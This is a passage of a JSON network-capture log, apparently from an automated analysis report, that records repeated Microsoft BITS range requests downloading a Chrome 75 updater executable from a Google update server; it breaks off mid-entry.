  501. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  502. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=182545-235456\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  503. "port": 80
  504. },
  505. {
  506. "count": 1,
  507. "body": "",
  508. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  509. "user-agent": "Microsoft BITS/7.5",
  510. "method": "GET",
  511. "host": "r5---sn-tt1e7n7e.gvt1.com",
  512. "version": "1.1",
  513. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  514. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=235457-387454\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  515. "port": 80
  516. },
  517. {
  518. "count": 1,
  519. "body": "",
  520. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  521. "user-agent": "Microsoft BITS/7.5",
  522. "method": "GET",
  523. "host": "r5---sn-tt1e7n7e.gvt1.com",
  524. "version": "1.1",
  525. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  526. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=387455-619308\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  527. "port": 80
  528. },
  529. {
  530. "count": 1,
  531. "body": "",
  532. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  533. "user-agent": "Microsoft BITS/7.5",
  534. "method": "GET",
  535. "host": "r5---sn-tt1e7n7e.gvt1.com",
  536. "version": "1.1",
  537. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  538. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=619309-843977\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  539. "port": 80
  540. },
  541. {
  542. "count": 1,
  543. "body": "",
  544. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  545. "user-agent": "Microsoft BITS/7.5",
  546. "method": "GET",
  547. "host": "r5---sn-tt1e7n7e.gvt1.com",
  548. "version": "1.1",
  549. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  550. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=843978-1423050\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  551. "port": 80
  552. },
  553. {
  554. "count": 1,
  555. "body": "",
  556. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  557. "user-agent": "Microsoft BITS/7.5",
  558. "method": "GET",
  559. "host": "r5---sn-tt1e7n7e.gvt1.com",
  560. "version": "1.1",
  561. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  562. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=1423051-2174378\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  563. "port": 80
  564. },
  565. {
  566. "count": 1,
  567. "body": "",
  568. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  569. "user-agent": "Microsoft BITS/7.5",
  570. "method": "GET",
  571. "host": "r5---sn-tt1e7n7e.gvt1.com",
  572. "version": "1.1",
  573. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  574. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=2174379-3522791\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  575. "port": 80
  576. },
  577. {
  578. "count": 1,
  579. "body": "",
  580. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  581. "user-agent": "Microsoft BITS/7.5",
  582. "method": "GET",
  583. "host": "r5---sn-tt1e7n7e.gvt1.com",
  584. "version": "1.1",
  585. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  586. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=3522792-5055846\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  587. "port": 80
  588. },
  589. {
  590. "count": 1,
  591. "body": "",
  592. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  593. "user-agent": "Microsoft BITS/7.5",
  594. "method": "GET",
  595. "host": "r5---sn-tt1e7n7e.gvt1.com",
  596. "version": "1.1",
  597. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  598. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=5055847-6102108\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  599. "port": 80
  600. },
  601. {
  602. "count": 1,
  603. "body": "",
  604. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  605. "user-agent": "Microsoft BITS/7.5",
  606. "method": "GET",
  607. "host": "r5---sn-tt1e7n7e.gvt1.com",
  608. "version": "1.1",
  609. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  610. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=6102109-7233475\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  611. "port": 80
  612. },
  613. {
  614. "count": 1,
  615. "body": "",
  616. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  617. "user-agent": "Microsoft BITS/7.5",
  618. "method": "GET",
  619. "host": "r5---sn-tt1e7n7e.gvt1.com",
  620. "version": "1.1",
  621. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  622. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=7233476-9002772\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  623. "port": 80
  624. },
  625. {
  626. "count": 1,
  627. "body": "",
  628. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  629. "user-agent": "Microsoft BITS/7.5",
  630. "method": "GET",
  631. "host": "r5---sn-tt1e7n7e.gvt1.com",
  632. "version": "1.1",
  633. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  634. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=9002773-10438628\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  635. "port": 80
  636. },
  637. {
  638. "count": 1,
  639. "body": "",
  640. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  641. "user-agent": "Microsoft BITS/7.5",
  642. "method": "GET",
  643. "host": "r5---sn-tt1e7n7e.gvt1.com",
  644. "version": "1.1",
  645. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  646. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=10438629-11885988\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  647. "port": 80
  648. },
  649. {
  650. "count": 1,
  651. "body": "",
  652. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  653. "user-agent": "Microsoft BITS/7.5",
  654. "method": "GET",
  655. "host": "r5---sn-tt1e7n7e.gvt1.com",
  656. "version": "1.1",
  657. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  658. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=11885989-12942231\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  659. "port": 80
  660. },
  661. {
  662. "count": 1,
  663. "body": "",
  664. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  665. "user-agent": "Microsoft BITS/7.5",
  666. "method": "GET",
  667. "host": "r5---sn-tt1e7n7e.gvt1.com",
  668. "version": "1.1",
  669. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  670. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=12942232-13981114\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  671. "port": 80
  672. },
  673. {
  674. "count": 1,
  675. "body": "",
  676. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  677. "user-agent": "Microsoft BITS/7.5",
  678. "method": "GET",
  679. "host": "r5---sn-tt1e7n7e.gvt1.com",
  680. "version": "1.1",
  681. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  682. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=13981115-15457991\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  683. "port": 80
  684. },
  685. {
  686. "count": 1,
  687. "body": "",
  688. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  689. "user-agent": "Microsoft BITS/7.5",
  690. "method": "GET",
  691. "host": "r5---sn-tt1e7n7e.gvt1.com",
  692. "version": "1.1",
  693. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  694. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=15457992-16973479\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  695. "port": 80
  696. },
  697. {
  698. "count": 1,
  699. "body": "",
  700. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  701. "user-agent": "Microsoft BITS/7.5",
  702. "method": "GET",
  703. "host": "r5---sn-tt1e7n7e.gvt1.com",
  704. "version": "1.1",
  705. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  706. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=16973480-18438938\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  707. "port": 80
  708. },
  709. {
  710. "count": 1,
  711. "body": "",
  712. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  713. "user-agent": "Microsoft BITS/7.5",
  714. "method": "GET",
  715. "host": "r5---sn-tt1e7n7e.gvt1.com",
  716. "version": "1.1",
  717. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
